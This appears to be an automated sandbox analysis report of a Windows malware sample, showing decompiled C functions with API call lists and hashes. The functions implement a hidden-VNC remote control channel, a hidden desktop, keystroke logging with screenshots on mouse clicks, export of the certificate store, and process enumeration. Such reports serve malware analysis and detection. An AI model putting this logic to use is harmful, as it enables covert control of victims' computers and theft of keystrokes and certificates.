    														E0041194C(_t390,  &_v20);
    													}
    												}
    												goto L31;
    											}
    										}
    										L31:
    										_v28 = _v28 + 1;
    										_v24 = _v24 + 9;
    									} while (_v28 < _v8);
    									_t509 = 0;
    									goto L33;
    								}
    								L35:
    								_t376 = _a4;
    								_t414 = _a4;
    								_t257 = E00414974(1, _a4,  &_a15, 0x1b7740);
    								__eflags = _t257;
    								if(_t257 == 0) {
    									goto L104;
    								}
    								_t261 = _a15 & 0x000000ff;
    								__eflags = _t261;
    								if(_t261 == 0) {
    									_t262 = E004149BC(_t414, _t376, 3, 0x1b7740);
    									__eflags = _t262;
    									if(_t262 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v80);
    									_t264 = 0x10;
    									_t265 = E00414974(_t264, _t376);
    									__eflags = _t265;
    									if(_t265 == 0) {
    										goto L104;
    									}
    									__eflags = _v80 - 0x20;
    									if(_v80 == 0x20) {
    										L99:
    										__eflags = _v77;
    										if(_v77 == 0) {
    											goto L104;
    										}
    										asm("rol word [ebp-0x48], 0x8");
    										asm("rol word [ebp-0x46], 0x8");
    										asm("rol word [ebp-0x44], 0x8");
    										__eflags = _v78;
    										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
    										_t196 = _t505 + 0x31; // 0x31
    										_v77 = 1;
    										E004119FD(_t196,  &_v80, 0x10);
    										 *(_t505 + 0x41) = _v80 >> 3;
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    									}
    									__eflags = _v80 - 0x10;
    									if(_v80 == 0x10) {
    										goto L99;
    									}
    									__eflags = _v80 - 8;
    									if(_v80 != 8) {
    										goto L104;
    									}
    									goto L99;
    								}
    								_t288 = _t261;
    								__eflags = _t288;
    								if(_t288 == 0) {
    									_t289 = E004149BC(_t414, _t376, 1, 0x1b7740);
    									__eflags = _t289;
    									if(_t289 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v32);
    									_t291 = 2;
    									_t292 = E00414974(_t291, _t376);
    									__eflags = _t292;
    									if(_t292 == 0) {
    										goto L104;
    									}
    									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
    									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
    									 *(_t505 + 0x48) = _t296;
    									__eflags = _t296;
    									if(_t296 == 0) {
    										L89:
    										_t297 =  *(_t505 + 0x4c);
    										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
    										 *(_t505 + 0x50) = _t490;
    										__eflags = _t297 - 5;
    										if(_t297 != 5) {
    											E004119C1( *(_t505 + 0x1c));
    											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    										}
    										goto L90;
    									}
    									_t378 = (_t296 & 0x0000ffff) << 2;
    									_t161 = _t505 + 0x44; // 0x44
    									_t517 = _t161;
    									_t301 = E0041194C((_t296 & 0x0000ffff) << 2, _t517);
    									__eflags = _t301;
    									if(_t301 == 0) {
    										goto L104;
    									}
    									_t303 = E00414974(_t378, _a4,  *_t517, 0x1b7740);
    									__eflags = _t303;
    									if(_t303 == 0) {
    										goto L104;
    									}
    									_v28 = _v28 & 0x00000000;
    									__eflags = 0 -  *(_t505 + 0x48);
    									if(0 >=  *(_t505 + 0x48)) {
    										goto L89;
    									}
    									_t305 =  *_t517;
    									do {
    										_t491 = _v28 & 0x0000ffff;
    										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
    										_t305 =  *((intOrPtr*)(_t505 + 0x44));
    										_t426 = 5;
    										__eflags =  *(_t305 + _t491 * 4) - _t426;
    										if( *(_t305 + _t491 * 4) == _t426) {
    											 *(_t505 + 0x4c) = _t426;
    										}
    										_v28 = _v28 + 1;
    										__eflags = _v28 -  *(_t505 + 0x48);
    									} while (_v28 <  *(_t505 + 0x48));
    									goto L89;
    								}
    								_t309 = _t288 - 1;
    								__eflags = _t309;
    								if(_t309 == 0) {
    									_push(0x1b7740);
    									_push( &_v56);
    									_t311 = 9;
    									_t312 = E00414974(_t311, _t376);
    									__eflags = _t312;
    									if(_t312 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0x33], 0x8");
    									asm("rol word [ebp-0x31], 0x8");
    									asm("rol word [ebp-0x2f], 0x8");
    									asm("rol word [ebp-0x2d], 0x8");
    									__eflags = _v56;
    									_t382 = 0;
    									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
    									__eflags = _v8;
    									if(_v8 <= 0) {
    										L76:
    										__eflags = _t382 - _v8;
    										if(_t382 != _v8) {
    											L78:
    											E004119FD(_t382 * 9 + _v20,  &_v56, 9);
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    											goto L35;
    										}
    										_v8 = _v8 + 1;
    										_t316 = E0041194C(_v8 * 9,  &_v20);
    										__eflags = _t316;
    										if(_t316 == 0) {
    											goto L104;
    										}
    										goto L78;
    									}
    									_t318 = _v20 + 7;
    									__eflags = _t318;
    									do {
    										__eflags =  *(_t318 - 2);
    										if( *(_t318 - 2) != 0) {
    											goto L75;
    										}
    										__eflags =  *_t318;
    										if( *_t318 == 0) {
    											goto L76;
    										}
    										L75:
    										_t382 = _t382 + 1;
    										_t318 = _t318 + 9;
    										__eflags = _t382 - _v8;
    									} while (_t382 < _v8);
    									goto L76;
    								}
    								_t319 = _t309 - 1;
    								__eflags = _t319;
    								if(_t319 == 0) {
    									_push(0x1b7740);
    									_push( &_v112);
    									_t321 = 7;
    									_t322 = E00414974(_t321, _t376);
    									__eflags = _t322;
    									if(_t322 == 0) {
    										goto L104;
    									}
    									__eflags = _v112;
    									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
    									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
    									continue;
    								}
    								_t329 = _t319 - 1;
    								__eflags = _t329;
    								if(_t329 == 0) {
    									_push(0x1b7740);
    									_push( &_v16);
    									_t331 = 5;
    									_t332 = E00414974(_t331, _t376);
    									__eflags = _t332;
    									if(_t332 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0xb], 0x8");
    									asm("rol word [ebp-0x9], 0x8");
    									_v24 = _v24 & 0x00000000;
    									_t525 = 0x8000;
    									_t333 = GetSystemMetrics(0x17);
    									__eflags = _t333;
    									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
    									__eflags = _v15 - _v43;
    									if(_v15 != _v43) {
    										L50:
    										_t525 = 0x8001;
    										L51:
    										_t335 = _v44;
    										_t442 = _v16 & 0x00000001;
    										__eflags = _t442 - (_t335 & 0x00000001);
    										if(_t442 != (_t335 & 0x00000001)) {
    											__eflags = _t442;
    											if(_t442 == 0) {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
    												__eflags = _t461;
    											} else {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
    											}
    											_t525 = _t525 | _t461;
    											__eflags = _t525;
    										}
    										_t444 = _v16 & 0x00000004;
    										__eflags = _t444 - (_t335 & 0x00000004);
    										if(_t444 != (_t335 & 0x00000004)) {
    											__eflags = _t444;
    											if(_t444 == 0) {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
    												__eflags = _t452;
    											} else {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
    											}
    											_t525 = _t525 | _t452;
    											__eflags = _t525;
    										}
    										_t446 = _v16 & 0x00000002;
    										__eflags = _t446 - (_t335 & 0x00000002);
    										if(_t446 != (_t335 & 0x00000002)) {
    											__eflags = _t446;
    											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
    											__eflags = _t525;
    										}
    										__eflags = _v16 & 0x00000008;
    										if((_v16 & 0x00000008) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0x78;
    										}
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0xffffff88;
    										}
    										E004119FD( &_v44,  &_v16, 5);
    										_t490 = _t525;
    										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
    										continue;
    									}
    									__eflags = _v13 - _v41;
    									if(_v13 == _v41) {
    										goto L51;
    									}
    									goto L50;
    								}
    								__eflags = _t329 != 1;
    								if(_t329 != 1) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v116);
    								_t352 = 3;
    								_t353 = E00414974(_t352, _t376);
    								__eflags = _t353;
    								if(_t353 == 0) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v64);
    								_t355 = 4;
    								_t356 = E00414974(_t355, _t376);
    								__eflags = _t356;
    								if(_t356 == 0) {
    									goto L104;
    								}
    								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
    								_t389 = E00411991(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
    								__eflags = _t389;
    								if(_t389 == 0) {
    									E004119C1(0);
    									goto L104;
    								}
    								_t366 = E00414974(_v64, _a4, _t389, 0x1b7740);
    								__eflags = _t366;
    								if(_t366 == 0) {
    									goto L104;
    								}
    								_t490 = _v64;
    								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
    								E004119C1(_t389);
    							}
    							_t300 = E00411991(0x400);
    							 *(_t505 + 0x1c) = _t300;
    							__eflags = _t300;
    						} while (_t300 != 0);
    						goto L104;
    					}
    				}
    			}


    APIs
      • Part of subcall function 004149EB: send.WS2_32(00000000,00000000,00000000,00000000), ref: 004149F9
    • WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0041AC3E,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 004113BE
    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 004113D9
    • ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041146B
    • GetSystemMetrics.USER32 ref: 00411585
      • Part of subcall function 00414974: recv.WS2_32(?,?,00000001,00000000), ref: 00414998
    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 00411911
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
    • String ID: $RFB $RFB 003.003$x
    • API String ID: 3911805420-914445781
    • Opcode ID: 49d5f6d6148f3d1cd33864147e0ee774c0ea18f9f30d4ed1ce20a60ccccd41b4
    • Instruction ID: 5511e90b34acd8e29d5fa6664ad75ce6362559d06cdab88b0433b204dcc25f2d
    • Opcode Fuzzy Hash: 49d5f6d6148f3d1cd33864147e0ee774c0ea18f9f30d4ed1ce20a60ccccd41b4
    • Instruction Fuzzy Hash: 3E323571E102199BDF24DBA4C851BFE7BB5EF44304F04412BEA61E72A2DB7C8985C798
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004090BA(void* __ecx, void* __eflags, WCHAR* _a4) {
    				char _v5;
    				struct HWINSTA__* _v12;
    				struct HWINSTA__* _v16;
    				char _v32;
    				char _v48;
    				void* __esi;
    				struct HWINSTA__* _t23;
    				WCHAR* _t28;
    				int _t35;
    				struct HWINSTA__* _t41;
    				void* _t43;
    				WCHAR* _t45;
    				struct HDESK__* _t46;
    
    				_t43 = __ecx;
    				_t45 =  &_v32;
    				_v5 = 0;
    				E00419DD3(0xcc, _t45);
    				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
    				_v12 = _t23;
    				if(_t23 != 0) {
    					L2:
    					_v16 = GetProcessWindowStation();
    					if(E00409092(_t50, _v12) == 0) {
    						L13:
    						CloseWindowStation(_v12);
    						L14:
    						return _v5;
    					}
    					_t28 = _a4;
    					_a4 = _t28;
    					if(_t28 == 0) {
    						_t37 =  &_v48;
    						_a4 =  &_v48;
    						E00419DD3(0xcd, _t37);
    					}
    					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
    					if(_t46 != 0) {
    						L7:
    						if(E0040904D(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
    							L9:
    							_v5 = 1;
    							L10:
    							CloseDesktop(_t46);
    							if(_v5 != 0) {
    								goto L13;
    							}
    							goto L11;
    						}
    						_t35 = SetThreadDesktop(_t46);
    						_v5 = 0;
    						if(_t35 == 0) {
    							goto L10;
    						}
    						goto L9;
    					} else {
    						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
    						_t54 = _t46;
    						if(_t46 == 0) {
    							L11:
    							_t58 = _v16;
    							if(_v16 != 0) {
    								E00409092(_t58, _v16);
    							}
    							goto L13;
    						}
    						goto L7;
    					}
    				}
    				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
    				_v12 = _t41;
    				_t50 = _t41;
    				if(_t41 == 0) {
    					goto L14;
    				}
    				goto L2;
    			}

    APIs
    • OpenWindowStationW.USER32(?,00000000,10000000), ref: 004090DF
    • CreateWindowStationW.USER32 ref: 004090F2
    • GetProcessWindowStation.USER32(?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409103
    • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040913E
    • CreateDesktopW.USER32 ref: 00409152
    • GetCurrentThreadId.KERNEL32 ref: 0040915E
    • GetThreadDesktop.USER32(00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409165
    • SetThreadDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409177
    • CloseDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409189
    • CloseWindowStation.USER32(?,?,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 004091A4
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
    • String ID:
    • API String ID: 2917431391-0
    • Opcode ID: 94c05638b91f17ec2a3f21bfdf7eb3fe139a00ea282614daecfe9fe8ed487feb
    • Instruction ID: b849f5420282c2517e0d2d0dd82cac4b07f708afd5df827c598018cb40128f7f
    • Opcode Fuzzy Hash: 94c05638b91f17ec2a3f21bfdf7eb3fe139a00ea282614daecfe9fe8ed487feb
    • Instruction Fuzzy Hash: E1214F75900259BFEF106BA59C8C99F7F68EB45388F04407AF901B7262D6394D458A68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041D1BF(MSG* _a4) {
    				char _v524;
    				char _v780;
    				char _v840;
    				char _v864;
    				short _v884;
    				intOrPtr* _v888;
    				intOrPtr _v900;
    				void* __edi;
    				void* __esi;
    				int _t25;
    				signed int _t27;
    				signed int _t32;
    				void* _t36;
    				intOrPtr _t39;
    				WCHAR* _t45;
    				MSG* _t54;
    				WCHAR* _t65;
    				intOrPtr* _t66;
    				signed int _t67;
    				void* _t69;
    
    				_t69 = (_t67 & 0xfffffff8) - 0x374;
    				_t54 = _a4;
    				if(_t54 == 0 || E00406473() == 0) {
    					L20:
    					return TranslateMessage(_t54);
    				} else {
    					_t25 = _t54->message;
    					if(_t25 != 0x201) {
    						__eflags = _t25 - 0x100;
    						if(_t25 != 0x100) {
    							goto L20;
    						}
    						__eflags = _t54->wParam - 0x1b;
    						if(_t54->wParam == 0x1b) {
    							goto L20;
    						}
    						_t27 = GetKeyboardState( &_v780);
    						__eflags = _t27;
    						if(_t27 == 0) {
    							goto L20;
    						}
    						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
    						__eflags = _t32;
    						if(_t32 <= 0) {
    							goto L20;
    						}
    						__eflags = _t32 - 1;
    						if(__eflags != 0) {
    							if(__eflags > 0) {
    								L18:
    								__eflags = 0;
    								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
    								_push( &_v884);
    								L19:
    								E0041D022();
    								goto L20;
    							}
    							L17:
    							__eflags = _v884 - 0x20;
    							if(_v884 < 0x20) {
    								goto L20;
    							}
    							goto L18;
    						}
    						__eflags = _t54->wParam - 8;
    						if(_t54->wParam != 8) {
    							goto L17;
    						}
    						_push(0x404c38);
    						goto L19;
    					}
    					EnterCriticalSection(0x424010);
    					if( *0x424008 > 0) {
    						 *0x424008 =  *0x424008 + 0xffff;
    						_t36 = 2;
    						E00419DD3(_t36,  &_v864);
    						_t39 = E0041A1A9( &_v864, 0x1e, 0x1f4);
    						_v900 = _t39;
    						if(_t39 != 0) {
    							E00419DD3(0,  &_v840);
    							_t65 =  &_v884;
    							E00419DD3(1, _t65);
    							_t45 =  *0x423e74;
    							if(_t45 != 0) {
    								_t65 = _t45;
    							}
    							E004126B4( &_v840, 0x104,  &_v524,  &_v840);
    							_t66 = _v888;
    							E0040B9F9(0x104, _t66,  &_v524);
    							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x4227a0, GetTickCount());
    						}
    					}
    					LeaveCriticalSection(0x424010);
    					goto L20;
    				}
    			}

    APIs
    • TranslateMessage.USER32(?), ref: 0041D316
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • EnterCriticalSection.KERNEL32(00424010), ref: 0041D1F9
    • LeaveCriticalSection.KERNEL32(00424010), ref: 0041D29C
      • Part of subcall function 0041A1A9: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A1DB
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A1EC
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A1F9
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A206
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A213
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A220
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A22D
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A23A
      • Part of subcall function 0041A1A9: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A282
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A28D
      • Part of subcall function 0041A1A9: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A29F
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A2AA
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A2B6
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A2C3
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A2D0
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A2DD
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A2EA
      • Part of subcall function 0041A1A9: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A2F7
    • GetTickCount.KERNEL32 ref: 0041D25E
    • GetKeyboardState.USER32(?), ref: 0041D2B6
    • ToUnicode.USER32 ref: 0041D2DE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
    • String ID:
    • API String ID: 2762424063-3916222277
    • Opcode ID: a0e8fae3d2d758044487d9a8063dc74ba889240b67623f6146865977907b9de9
    • Instruction ID: 6d932b5759b52da30b2a44be7f9c9da87e3c67bca1a0d9cde2be08cd8e8ced19
    • Opcode Fuzzy Hash: a0e8fae3d2d758044487d9a8063dc74ba889240b67623f6146865977907b9de9
    • Instruction Fuzzy Hash: 0831C2B1A003059BDB20AF64DC49ADB77B8EB48304F04483BFA64E7191DB78D8C5879E
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00403408), ref: 0040C701
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C71D
    • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040C729
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C768
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040C798
    • CharLowerW.USER32(?,?,00000000,00000001), ref: 0040C7B6
    • GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0040C7C1
    • CertCloseStore.CRYPT32(?,00000000), ref: 0040C84A
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
    • String ID:
    • API String ID: 3751268071-0
    • Opcode ID: 91bb8b32d5dff269fd845b61f1ec64dd6b086ada7dcff7f4a268aea9fc6baf91
    • Instruction ID: eee9b3b908420dca936445f80bd5713386a219e54e77bef1342df4e3b33a77d7
    • Opcode Fuzzy Hash: 91bb8b32d5dff269fd845b61f1ec64dd6b086ada7dcff7f4a268aea9fc6baf91
    • Instruction Fuzzy Hash: 6741A872108341EBD711AF65DD80AAF7BDCAB84344F004A3FF584F21A1D638DD4587AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A01E() {
    				long _v564;
    				char _v568;
    				void* _v572;
    				char _v576;
    				void* _v580;
    				void* _v584;
    				void* _v588;
    				char _v589;
    				signed int _v592;
    				signed int _v596;
    				char _v597;
    				void* __esi;
    				void* _t42;
    				struct tagPROCESSENTRY32W* _t45;
    				signed int _t47;
    				void* _t48;
    				long _t56;
    				intOrPtr* _t57;
    				void** _t59;
    				void** _t60;
    				void** _t62;
    				long _t67;
    				int _t74;
    				void** _t76;
    				void* _t79;
    
    				_t74 = 0;
    				_v589 = 0;
    				_v584 = 0;
    				_v588 = 0;
    				while(1) {
    					_t42 = CreateToolhelp32Snapshot(2, _t74);
    					_v584 = _t42;
    					_v580 = _t74;
    					if(_t42 == 0xffffffff) {
    						break;
    					} else {
    						_t45 =  &_v568;
    						_v568 = 0x22c;
    						Process32FirstW(_v584, _t45);
    					}
    					while(_t45 != 0) {
    						_t67 = _v564;
    						__eflags = _t67 - _t74;
    						if(_t67 <= _t74) {
    							L20:
    							_t45 = Process32NextW(_v588,  &_v572);
    							continue;
    						}
    						__eflags = _t67 -  *0x4227a0; // 0x0
    						if(__eflags == 0) {
    							goto L20;
    						}
    						_t47 = 0;
    						__eflags = _v596 - _t74;
    						if(_v596 <= _t74) {
    							L8:
    							_t48 = E00406296(_t67, _t72, _t67);
    							_v584 = _t48;
    							__eflags = _t48 - _t74;
    							if(_t48 == _t74) {
    								goto L20;
    							}
    							_t79 = OpenProcess(0x400, _t74, _v564);
    							__eflags = _t79 - _t74;
    							if(_t79 == _t74) {
    								L19:
    								CloseHandle(_v580);
    								goto L20;
    							}
    							_t76 = E00412FD8(_t67, _t79,  &_v576);
    							CloseHandle(_t79);
    							__eflags = _t76;
    							if(_t76 == 0) {
    								L18:
    								_t74 = 0;
    								__eflags = 0;
    								goto L19;
    							} else {
    								__eflags = _v576 -  *0x422540; // 0x0
    								if(__eflags == 0) {
    									_t56 = GetLengthSid( *_t76);
    									__eflags = _t56 -  *0x422538;
    									if(_t56 ==  *0x422538) {
    										_t57 =  *0x422534; // 0x0
    										_t59 = E00411A32( *_t57,  *_t76, _t56);
    										__eflags = _t59;
    										if(_t59 == 0) {
    											_t60 = E0041194C(4 + _v596 * 4,  &_v592);
    											__eflags = _t60;
    											if(_t60 != 0) {
    												_t72 = _v596;
    												_v596 = _v596 + 1;
    												_v584 = _v584 + 1;
    												 *((intOrPtr*)(_v592 + _v596 * 4)) = _v564;
    												_t62 = E00419F95(_v592, _v564, _v580);
    												__eflags = _t62;
    												if(_t62 != 0) {
    													_v597 = 1;
    												}
    											}
    										}
    									}
    								}
    								E004119C1(_t76);
    								goto L18;
    							}
    						} else {
    							goto L6;
    						}
    						while(1) {
    							L6:
    							_t72 = _v592;
    							__eflags =  *((intOrPtr*)(_t72 + _t47 * 4)) - _t67;
    							if( *((intOrPtr*)(_t72 + _t47 * 4)) == _t67) {
    								goto L20;
    							}
    							_t47 = _t47 + 1;
    							__eflags = _t47 - _v596;
    							if(_t47 < _v596) {
    								continue;
    							}
    							goto L8;
    						}
    						goto L20;
    					}
    					CloseHandle(_v588);
    					if(_v584 != _t74) {
    						continue;
    					}
    					break;
    				}
    				E004119C1(_v588);
    				return _v597;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041A045
    • Process32FirstW.KERNEL32 ref: 0041A06D
    • OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C), ref: 0041A0C8
    • CloseHandle.KERNEL32(00000000,00000000,?), ref: 0041A0E6
    • GetLengthSid.ADVAPI32(00000000), ref: 0041A0FA
    • CloseHandle.KERNEL32(?), ref: 0041A16C
    • Process32NextW.KERNEL32(?,?), ref: 0041A177
    • CloseHandle.KERNEL32(?), ref: 0041A189
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
    • String ID:
    • API String ID: 1981844004-0
    • Opcode ID: e04d1511fa3e966b90ac0db0fb08dd2fc2b67ae554bc567e3e00ab5a443b6adf
    • Instruction ID: 927509cd7e2e9630669f0e31b38bab1e95e05c35ba268d9a56f8afc6c579c2a7
    • Opcode Fuzzy Hash: e04d1511fa3e966b90ac0db0fb08dd2fc2b67ae554bc567e3e00ab5a443b6adf
    • Instruction Fuzzy Hash: 8B418970109301AFC711EF24D9849ABBBE5FFC8304F14092EF598A2260D7749CA9CB5B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E004170EA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
    				short _v524;
    				struct _WIN32_FIND_DATAW _v1116;
    				intOrPtr _v1120;
    				intOrPtr _v1124;
    				void* _v1128;
    				int _t51;
    				signed int _t60;
    				long _t68;
    				signed char _t71;
    				signed int _t83;
    
    				_v1120 = __edx;
    				_v1124 = __ecx;
    				_t51 = E00417246("*",  &_v524, __ecx);
    				if(_t51 == 0) {
    					L25:
    					return _t51;
    				}
